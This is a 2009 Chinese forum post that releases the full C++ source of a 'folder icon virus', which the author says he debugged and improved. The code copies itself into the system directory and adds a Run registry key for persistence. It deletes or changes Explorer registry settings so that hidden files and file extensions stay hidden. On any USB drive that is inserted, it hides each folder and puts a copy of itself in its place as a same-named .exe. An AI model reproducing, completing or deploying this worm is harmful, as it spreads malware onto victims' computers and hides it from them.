none
([原创]文件夹图标病毒 RRS feed

  • 常规讨论

  •  

    /*文章作者:ALALMN JACK    BLOG  http://hi.baidu.com/alalmn   QQ316118740
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com

    在邪八看到这个  ([原创]文件夹图标病毒以及专杀的实现)     呵呵
    我们学校也有  我也中过  挺有意思的   我下载下来  一直没看代码
    过年的时候刚好有时间看了下   发现很多问题(BUG)  后来给作者说下自己又改下  现在发布下
    2009/1/27     */


    #include "stdafx.h"
    #include <windows.h>
    #include "resource.h"  
    /////////////////////////////////////////////////////
    VOID DoBad(char DriveBuf[]);
    VOID DoBad(char DriveBuf[]) 
    {
     CFileFind finder;
     // build a string with wildcards
     CString strWildcard(DriveBuf);
     strWildcard += _T("*.*");
     char FileSource[MAX_PATH]={0}; 
     char FileNew[MAX_PATH]={0};
     HMODULE hModule=GetModuleHandle(NULL); 
     GetModuleFileName(hModule,FileSource,MAX_PATH); 
     CloseHandle(hModule);  
     // start working for files
     BOOL bWorking = finder.FindFile(strWildcard); 
     while (bWorking)
     {
      bWorking = finder.FindNextFile();
      if (finder.IsDots()) 
       continue;
      // if it's a directory, recursively search it
      if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
      {       
       if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))  //| FILE_ATTRIBUTE_SYSTEM
        continue; 
                sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
       CopyFile(FileSource,FileNew,TRUE); 
      }
     }
     finder.Close();
    }
    /////////////////////////////////////////////////////
    #include <dbt.h>
    char diskPath[5] = { 0 };
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
    {
    // char U[4];
     PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
     DWORD allDisk = GetLogicalDrives();
     if (allDisk!=0)
     {
     switch(wParam)
     {
     case DBT_DEVICEARRIVAL:
      {
      for (int i=0;i<40;i++)
      {
       if ((allDisk & 1)==1)
       {
        sprintf(diskPath, "%c", 'C'+i ); 
        strcat(diskPath, ":\\" );
        
        if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
        {
         if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
         {
          //MessageBox( NULL,diskPath, "1",MB_OK );
          DoBad(diskPath);
          break;
         }
        }
       }
       allDisk = allDisk>>1;
      }
      }
     break;
     case DBT_DEVICEREMOVECOMPLETE:
      MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
     break;
     }
     }
     return LRESULT();
    }

    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
    {
     switch(message)
     {
     case WM_CREATE:
      break;
     case WM_DEVICECHANGE:
    //  if(modify_data.IsUpan)
       OnDeviceChange(hWnd,wParam,lParam);
      break;
     case WM_CLOSE:
      return FALSE; 
     case WM_DESTROY:
      return FALSE;
     default:
      return DefWindowProc(hWnd,message,wParam,lParam);
     }
     return 0;
    }

    int CreateMyWindow();
    int CreateMyWindow()
    {
     MSG msg;
     WNDCLASS wndc;
     LPSTR szAppName="WebDown";
     wndc.style=0;
     wndc.lpfnWndProc=WndProc;  
     wndc.cbClsExtra=0;
     wndc.cbWndExtra=0;
     wndc.hInstance=NULL;
     wndc.hIcon=NULL;
     wndc.hCursor=NULL;
     wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
     wndc.lpszMenuName=NULL;
     wndc.lpszClassName=szAppName;
     RegisterClass(&wndc);
     HWND hWnd=CreateWindow(szAppName,"hacker",
      WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
      CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
     ShowWindow(hWnd,SW_HIDE);
     UpdateWindow(hWnd); 
     
     SendMessage(hWnd,WM_DEVICECHANGE,0,0);
     
     while(GetMessage(&msg,NULL,0,0))
     {
      TranslateMessage(&msg);
      DispatchMessage(&msg);
     }
     return 1;
    }

    /////////////////////////////////////////////////////
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey) 
    {
     LONG lResult;
     HKEY hSubKey;
     DWORD   dwIndex, cbName;
     char   szSubKey[512];
     FILETIME   ft;
     lResult   =   RegOpenKeyEx(hKey,   lpSubKey,   0,   KEY_ALL_ACCESS,&hSubKey);
     if (lResult != ERROR_SUCCESS)
     {
      RegCloseKey(hSubKey);
      //  return lResult;
     }
     dwIndex = 0;
     cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
     while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
     {
      DeleteSubKeyTree(hSubKey, szSubKey);
     }
     RegCloseKey(hSubKey);
     lResult = RegDeleteKey(hKey, lpSubKey);
     // return lResult;
    }


    void FuckReg();
    void FuckReg() 
    {
     HKEY hKey; 
     RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey); 
        TCHAR *valueA=_T("机器已经中毒了  本程序测试使用—JACK");
     RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
     RegCloseKey(hKey); 
     
     LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
     HKEY hKey1 = HKEY_LOCAL_MACHINE;
     DeleteSubKeyTree(hKey1, lpSubKey1);
     
     LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
     HKEY hKey2 = HKEY_LOCAL_MACHINE;
     DeleteSubKeyTree(hKey2, lpSubKey2);
     
     HKEY hKey3; 
     RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3); 
     DWORD valueA3=1;
     RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
     RegCloseKey(hKey3);  //关闭句柄
    }
    /////////////////////////////////////////////////////

    #include   <shellapi.h>
    #pragma comment(linker, "/ALIGN:4096")
    #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
    int main()
    {
    //////////////////////////////////////
    char fullPath[MAX_PATH]; 
    HMODULE hModule=GetModuleHandle(NULL);  
    GetModuleFileName(hModule, fullPath,MAX_PATH);
    CString strPath=(CString)fullPath;
    int ret=strPath.ReverseFind(_T('.exe'));  
    CString path=strPath.Left(ret-3)+_T("\\"); 
    //    MessageBox(path);   
        ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
    // ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);

    HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
    if(GetLastError()==ERROR_ALREADY_EXISTS)

     CloseHandle(m_hMutex);
     m_hMutex=NULL;
     ExitProcess(0);
    }
    /////////////////////////// 
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule1=GetModuleHandle(NULL);
    GetModuleFileName(hModule1,FileSource,MAX_PATH);
    CloseHandle(hModule1);
    GetSystemDirectory(FileNew,MAX_PATH);
    strcat(FileNew,"\\hacker.exe");
    /////////////////////////// 
    CopyFile(FileSource,FileNew,TRUE);
    HKEY hkey=HKEY_LOCAL_MACHINE;  
    char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
    HKEY phkResult;
    int len=sizeof(FileNew); 
    if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS) 
    {
     ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL); 

    if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)  
     ::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1)); 
    ::RegCloseKey(phkResult); 
    /////////////////////////// 
    FuckReg(); 
    CreateMyWindow(); 
    //-------------------------
    //while (1)   //创建一个死循环,不然主线程退出
    //{
    // Sleep(1000);
    //}
    //---------------------
    return 0;
    }

    2009年2月7日 8:10